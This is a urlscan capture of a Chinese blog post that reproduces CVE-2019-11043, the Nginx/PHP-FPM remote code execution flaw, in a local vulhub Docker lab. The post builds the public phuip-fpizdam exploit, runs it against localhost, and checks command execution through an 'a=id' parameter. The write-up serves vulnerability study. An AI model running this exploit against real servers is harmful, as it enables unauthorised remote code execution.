zy5uv-2aaaa-aaaad-qbniq-cai.icp0.io
Open in
urlscan Pro
2a0b:21c0:b002:2:5000:afff:fee6:a836
Public Scan
URL:
https://zy5uv-2aaaa-aaaad-qbniq-cai.icp0.io/archives/78f531e0/index.html
Submission: On November 25 via api from US — Scanned from CH
Submission: On November 25 via api from US — Scanned from CH
Form analysis
0 forms found in the DOMText Content
小晨曦 * 首页 * 标签 * 分类 * 归档 * 关于 * 友情链接 * 零组官网 * 520 * 迪迪 * ian * 小晨曦 小晨曦的博客 * 首页 * 标签 * 分类 * 归档 * 关于 * 友情链接 * 零组官网 * 520 * 迪迪 * ian CVE-2019-11043复现 漏洞复现 技术分享 发布日期: 2019-10-29 更新日期: 2019-10-29 文章字数: 496 阅读时长: 2 分 阅读次数: 43 -------------------------------------------------------------------------------- 漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。 在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。 漏洞复现 这里直接使用p牛的docker环境进行复现 PHP-FPM 远程代码执行漏洞(CVE-2019-11043) 安装DOCKER bash apt install docker docker-compose 启动DOCKER bash systemctl start docker 搭建环境 bash git clone https://github.com/vulhub/vulhub.git cd vulhub/php/CVE-2019-11043 docker-compose up -d 在启动环境前建议先设置镜像加速 在 /etc/docker/daemon.json 写入以下内容(如果不存在文件,请新建) json {"registry-mirrors":["https://registry.docker-cn.com"]} 以上是添加 docker 官方提供的中国镜像,也可以选择使用阿里云,中科大等镜像。添加镜像后需要重启docker bash sudo systemctl daemon-reload sudo systemctl restart docker 看到上面的界面代表环境启动成功,默认页面在http://127.0.0.1:8080/index.php 漏洞利用 安装golang,git代码并编译 bash apt install golang git clone https://github.com/neex/phuip-fpizdam.git cd phuip-fpizdam go get -v go build 运行 none go run . "http://127.0.0.1:8080/index.php" 验证 因为php-fpm会启动多个子进程,在访问/index.php?a=id时需要多访问几次,以访问到被污染的进程 复现完后建议删除或停止容器 bash docker ps //查看正在运行容器 docker stop containerId //containerId是容器的ID docker ps -a //查看所有容器 docker ps -a -q //查看所有容器ID docker stop $(docker ps -a -q) //停止所有容器 docker rm $(docker ps -a -q) //删除所有容器 -------------------------------------------------------------------------------- 漏洞复现 微信扫一扫:分享 微信扫一扫即可分享! 为正常使用来必力评论功能请激活JavaScript。 上一篇 Burp Suite v2020.9.2的汉化以及无cmd框启动 2019-12-02 资源分享 资源分享 下一篇 SQL注入以及UDF提权 熊海CMS的SQL注入以及后续的UDF提权 2019-10-28 技术分享 漏洞复现 sql注入 目录 1. 漏洞描述 2. 漏洞复现 看板娘 欢迎阅读「CVE-2019-11043复现 | 小晨曦」 Copyright © 2019-2022 2019 小晨曦 | Powered by Hexo | Theme Matery 站点总字数: 7.2k | 总访问量: 45 | 总访问人数: 45 搜索